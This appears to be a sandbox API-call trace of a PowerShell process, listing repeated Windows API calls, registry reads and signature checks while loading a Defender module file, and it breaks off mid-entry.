VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.862] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.862] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.863] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.863] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.863] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.863] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.863] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.863] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.863] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.863] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.863] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.863] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.864] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.864] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.865] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.865] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.865] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.865] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.865] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.865] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.865] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.865] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.866] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.866] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.866] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.866] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.866] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.866] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.866] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.866] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.866] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.866] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.867] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.867] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.867] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.867] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.867] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.867] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.867] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.867] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.867] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.867] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.867] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.867] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.867] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.867] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.868] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.868] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.868] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.868] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.868] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.868] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.868] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.868] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.869] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.869] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.869] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.869] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.869] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.869] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.869] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.869] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.869] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.869] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.869] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.869] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.869] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.870] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.870] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.870] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.870] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.870] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.870] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.870] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.870] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.870] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.870] VarDecCmp (pdecLeft=0x1b62c8d8, pdecRight=0x1b62c8c8) returned 0x0 [0336.870] VarDecCmp (pdecLeft=0x1b62c8b8, pdecRight=0x1b62c8a8) returned 0x2 [0336.988] CoCreateGuid (in: pguid=0x1b62b878 | out: pguid=0x1b62b878*(Data1=0x42e24f25, Data2=0x610d, Data3=0x4fd1, Data4=([0]=0x93, [1]=0x9b, [2]=0x91, [3]=0xdb, [4]=0x47, [5]=0x1a, [6]=0x62, [7]=0x63))) returned 0x0 [0338.649] CoCreateGuid (in: pguid=0x1b62ce58 | out: pguid=0x1b62ce58*(Data1=0xc45a0c93, Data2=0x13d, Data3=0x4605, Data4=([0]=0x8a, [1]=0xa9, [2]=0xf, [3]=0xa6, [4]=0xf9, [5]=0x36, [6]=0x50, [7]=0x67))) returned 0x0 [0338.660] AmsiScanBuffer () returned 0x80070015 [0338.728] EtwEventWriteTransfer () returned 0x0 [0338.779] EtwEventWriteTransfer () returned 0x0 [0338.782] EtwEventWriteTransfer () returned 0x0 [0338.786] EtwEventWriteTransfer () returned 0x0 [0338.788] EtwEventWriteTransfer () returned 0x0 [0338.791] EtwEventWriteTransfer () returned 0x0 [0338.793] EtwEventWriteTransfer () returned 0x0 [0338.796] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c0a0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0338.798] EtwEventActivityIdControl () returned 0x0 [0338.798] EtwEventActivityIdControl () returned 0x0 [0338.798] EtwEventActivityIdControl () returned 0x0 [0338.799] EtwEventActivityIdControl () returned 0x0 [0338.800] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0338.801] EtwEventActivityIdControl () returned 0x0 [0338.801] EtwEventActivityIdControl () returned 0x0 [0338.801] EtwEventActivityIdControl () returned 0x0 [0338.803] EtwEventActivityIdControl () returned 0x0 [0338.803] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x113719f, Data2=0x1454, Data3=0x41e4, Data4=([0]=0xbd, [1]=0x37, [2]=0x5, [3]=0x87, [4]=0xa2, [5]=0x2c, [6]=0x48, [7]=0x28))) returned 0x0 [0338.803] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xa38d81b3, Data2=0x4769, Data3=0x4527, Data4=([0]=0x9c, [1]=0xe5, [2]=0xff, [3]=0x2c, [4]=0xe1, [5]=0xcc, [6]=0x8f, [7]=0x33))) returned 0x0 [0338.803] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0338.804] EtwEventActivityIdControl () returned 0x0 [0338.804] EtwEventActivityIdControl () returned 0x0 [0338.804] EtwEventActivityIdControl () returned 0x0 [0338.805] EtwEventActivityIdControl () returned 0x0 [0338.805] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xb52bd00b, Data2=0x778, Data3=0x4c43, Data4=([0]=0xba, [1]=0x8e, [2]=0x45, [3]=0x9d, [4]=0xda, [5]=0xbc, [6]=0x6d, [7]=0xa1))) returned 0x0 [0338.805] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0338.806] EtwEventActivityIdControl () returned 0x0 [0338.806] EtwEventActivityIdControl () returned 0x0 [0338.806] EtwEventActivityIdControl () returned 0x0 [0338.829] EtwEventActivityIdControl () returned 0x0 [0338.829] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0x764920a4, Data2=0xda4f, Data3=0x4850, Data4=([0]=0x99, [1]=0x75, [2]=0x61, [3]=0xf3, [4]=0x53, [5]=0xe0, [6]=0x5, [7]=0x80))) returned 0x0 [0338.829] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0338.830] EtwEventActivityIdControl () returned 0x0 [0338.830] EtwEventActivityIdControl () returned 0x0 [0338.830] EtwEventActivityIdControl () returned 0x0 [0338.832] EtwEventActivityIdControl () returned 0x0 [0338.832] CoCreateGuid (in: pguid=0x1b62c748 | out: pguid=0x1b62c748*(Data1=0xbaa7fe50, Data2=0xda36, Data3=0x4b47, Data4=([0]=0xb3, [1]=0x61, [2]=0x47, [3]=0x9d, [4]=0xd0, [5]=0x0, [6]=0x9, [7]=0x5a))) returned 0x0 [0338.833] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x1b62c1c0, nSize=0xd5 | out: lpBuffer="") returned 0x0 [0338.834] EtwEventActivityIdControl () returned 0x0 [0338.834] EtwEventActivityIdControl () returned 0x0 [0338.834] EtwEventActivityIdControl () returned 0x0 [0338.835] EtwEventActivityIdControl () returned 0x0 [0338.837] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml")) returned 0x20 [0338.837] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0338.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0338.838] CoTaskMemAlloc (cb=0x20c) returned 0x1b647830 [0338.838] GetSystemDirectoryW (in: lpBuffer=0x1b647830, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0338.838] CoTaskMemFree (pv=0x1b647830) [0338.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1d [0338.838] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x1d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0338.838] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9f8) returned 1 [0338.838] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b62cd20 | out: lpFileInformation=0x1b62cd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee3b6495, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0x46178940, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xee3b6495, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x29678)) returned 1 [0338.839] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9a8) returned 1 [0338.839] GetSystemInfo (in: lpSystemInfo=0x1b62cda0 | out: lpSystemInfo=0x1b62cda0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0338.839] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62cca8 | out: phkResult=0x1b62cca8*=0x7cc) returned 0x0 [0338.840] RegQueryValueExW (in: hKey=0x7cc, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b62ccf8, lpData=0x0, lpcbData=0x1b62ccf0*=0x0 | out: lpType=0x1b62ccf8*=0x0, lpData=0x0, lpcbData=0x1b62ccf0*=0x0) returned 0x2 [0338.840] RegCloseKey (hKey=0x7cc) returned 0x0 [0338.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0338.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0338.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca48) returned 1 [0338.841] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x2c28dd8 | out: lpFileInformation=0x2c28dd8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2c574645, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60)) returned 1 [0338.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0338.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0338.841] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0338.841] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c9c8) returned 1 [0338.841] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62ccf0 | out: lpFileInformation=0x1b62ccf0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2c574645, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60)) returned 1 [0338.841] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c978) returned 1 [0338.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0338.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0338.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0338.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0338.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62c888) returned 1 [0338.842] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), fInfoLevelId=0x0, lpFileInformation=0x1b62cbb0 | out: lpFileInformation=0x1b62cbb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbd930d4, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x2c574645, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x7c2e180c, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x3b60)) returned 1 [0338.842] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c838) returned 1 [0338.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0338.842] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0338.842] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62ca88) returned 1 [0338.843] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0338.843] GetFileType (hFile=0x7cc) returned 0x1 [0338.843] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62c9f8) returned 1 [0338.843] GetFileType (hFile=0x7cc) returned 0x1 [0338.843] WTGetSignatureInfo () returned 0x0 [0338.883] CertDuplicateCertificateContext (pCertContext=0x1a852870) returned 0x1a852870 [0338.883] CryptCATHandleFromStore () returned 0x6f89d0 [0338.883] WTHelperGetProvSignerFromChain () returned 0x6f8900 [0338.883] WTHelperGetProvCertFromChain () returned 0x6fbbb0 [0338.884] CertDuplicateCertificateContext (pCertContext=0x1a852570) returned 0x1a852570 [0338.884] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b62caf8 | out: phkResult=0x1b62caf8*=0x7d4) returned 0x0 [0338.885] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x0, lpcbData=0x1b62cb40*=0x0 | out: lpType=0x1b62cb48*=0x1, lpData=0x0, lpcbData=0x1b62cb40*=0x56) returned 0x0 [0338.885] RegQueryValueExW (in: hKey=0x7d4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1b62cb48, lpData=0x2c29628, lpcbData=0x1b62cb40*=0x56 | out: lpType=0x1b62cb48*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1b62cb40*=0x56) returned 0x0 [0338.885] RegCloseKey (hKey=0x7d4) returned 0x0 [0338.885] CoTaskMemAlloc (cb=0x10) returned 0x1a8a7f90 [0338.885] CoTaskMemAlloc (cb=0x50) returned 0x1a89a620 [0338.885] WinVerifyTrust () returned 0x0 [0338.886] CoTaskMemFree (pv=0x1a89a620) [0338.886] CoTaskMemFree (pv=0x1a8a7f90) [0338.886] CertFreeCertificateContext (pCertContext=0x1a852870) returned 1 [0338.886] CloseHandle (hObject=0x7cc) returned 1 [0338.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0338.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", nBufferLength=0x50, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml", lpFilePart=0x0) returned 0x4f [0338.887] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62cd48) returned 1 [0338.887] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Defender\\MSFT_MpThreat.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\msft_mpthreat.cdxml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x7cc [0338.887] GetFileType (hFile=0x7cc) returned 0x1 [0338.888] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62ccb8) returned 1 [0338.888] GetFileType (hFile=0x7cc) returned 0x1 [0338.888] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x0 [0338.888] ReadFile (in: hFile=0x7cc, lpBuffer=0x2c2a760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: lpBuffer=0x2c2a760*, lpNumberOfBytesRead=0x1b62cd58*=0x1000, lpOverlapped=0x0) returned 1 [0338.890] SetFilePointer (in: hFile=0x7cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b62ccd8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b62ccd8*=0) returned 0x1000 [0338.890] ReadFile (in: hFile=0x7cc, lpBuffer=0x2c2a760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b62cd58, lpOverlapped=0x0 | out: 